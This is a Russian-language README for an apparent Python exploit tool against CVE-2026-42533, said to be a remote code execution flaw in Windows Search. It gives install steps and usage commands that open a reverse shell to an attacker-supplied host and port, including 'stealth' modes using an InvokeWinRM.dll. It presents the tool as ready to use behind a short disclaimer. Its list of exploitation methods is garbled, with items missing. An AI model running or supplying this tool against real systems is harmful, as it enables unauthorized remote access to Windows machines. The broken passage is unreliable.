
Эксплойт PoC для конкретной CVE, написанный на Python, для проверки уязвимостей и тестирования безопасности.
CVE-2026-42533 — это эксплойт для критической уязвимости удалённого выполнения кода (RCE) в службе Windows Search (WSS). Данный инструмент автоматизирует эксплуатацию уязвимости CVE-2026-42533 и поддерживает несколько режимов эксплуатации.
CVE-2026-42533 — критическая уязвимость удалённого выполнения кода в службе Windows Search (WSS). Уязвимость связана с некорректной обработкой специально сформированных запросов. Успешная эксплуатация позволяет неаутентифицированному удалённому злоумышленнику выполнить произвольный код в контексте целевой системы.
Данный PoC-эксплойт реализует несколько методов эксплуатации:
InvokeWinRM).-stealth-rpc.Клонируйте репозиторий и перейдите в каталог инструмента:
git clone https://github.com/example/CVE-2026-42533.git
cd CVE-2026-42533
Установите зависимости:
pip install -r requirements.txt
python CVE-2026-42533.py --target <IP-адрес> --lhost <IP-адрес> --lport <порт>
python CVE-2026-42533.py --target 192.168.1.10 --lhost 192.168.1.100 --lport 4444 --exploit-mode classic
python CVE-2026-42533.py --target 192.168.1.10 --lhost 192.168.1.100 --lport 4444 --exploit-mode stealth-http
python CVE-2026-42533.py --target 192.168.1.10 --lhost 192.168.1.100 --lport 4444 --exploit-mode stealth-rpc --rpc-dll InvokeWinRM.dll
| Параметр | Описание | По умолчанию |
|---|---|---|
--target | IP-адрес или имя хоста цели. | Обязательный |
--lhost | IP-адрес для reverse shell. | Обязательный |
--lport | Порт для reverse shell. | 4444 |
--exploit-mode | Режим эксплуатации: classic, stealth-http, stealth-rpc. | classic |
--rpc-dll | Путь к DLL для режима stealth-rpc. | InvokeWinRM.dll |
CVE-2026-42533/
├── CVE-2026-42533.py # Основной скрипт эксплойта
├── InvokeWinRM.dll # (Необязательно) DLL для режима Stealth RPC
├── requirements.txt # Зависимости Python
├── README.md # Документация
└── LICENSE # Лицензия
Инструмент автоматически запускает обработчик для reverse shell после отправки полезной нагрузки. Обработчик прослушивает указанный --lport и предоставляет интерактивную оболочку.
Данный инструмент предназначен только для образовательных целей и тестирования на проникновение в рамках авторизованных сред. Автор не несёт ответственности за любое неправомерное использование. Не используйте его в системах без явного разрешения.
Этот проект распространяется под лицензией MIT. Подробности см. в файле LICENSE.